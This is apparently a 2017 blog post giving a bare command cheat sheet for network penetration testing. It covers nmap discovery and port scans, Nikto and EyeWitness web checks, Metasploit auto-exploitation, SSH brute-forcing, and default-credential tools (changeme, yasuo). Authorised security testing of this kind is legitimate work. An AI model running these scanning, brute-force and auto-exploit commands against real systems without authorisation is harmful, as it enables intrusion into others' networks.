Jumat, 18 Agustus 2017

Network Infrastructure Penetration Testing

nmap -T4 -v -sn -n 10.10.10.0/24 | grep -B1 up | grep 'scan report' | awk '{print $5}' > 
livehost.txt
nmap -n -vvvv -sT -p0-65535 -A -iL livehost.txt -oA nmap_scan
for i in 21 22 23 80 443 445;do cat nmap_scan.gnmap | grep " $i/open"|cut -d " " -f2 > $i.txt;done

eyewitness --headless -d output -x nmap.xml -t 8 
cat 80.txt | nikto -h - -Display V -F htm -output niktoscan.html
root@kali:~/Tools/web-app/tellmeweb# ./tell-me-web.rb nmap_scan.gnmap

msf > workspace -a clientname
msf > workspace clientname
msf > db_import nmap_scan.xml

msf > db_import /root/Nessus/nessus_scan.nbe
msf > load pentest
msf > vuln_exploit

msf > resource auto_brute.rc
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > service -p 22 -u -R

msf auxiliary(ssh_login) > exploit -j -z 

root@kali:~/Tools/bruteforce/changeme# ./changeme.py -x nmap_scan.xml
root@kali:~/Tools/web-app/yasuo# ./yasuo.rb -b all -f nmap_scan.xml

Tidak ada komentar:

Posting Komentar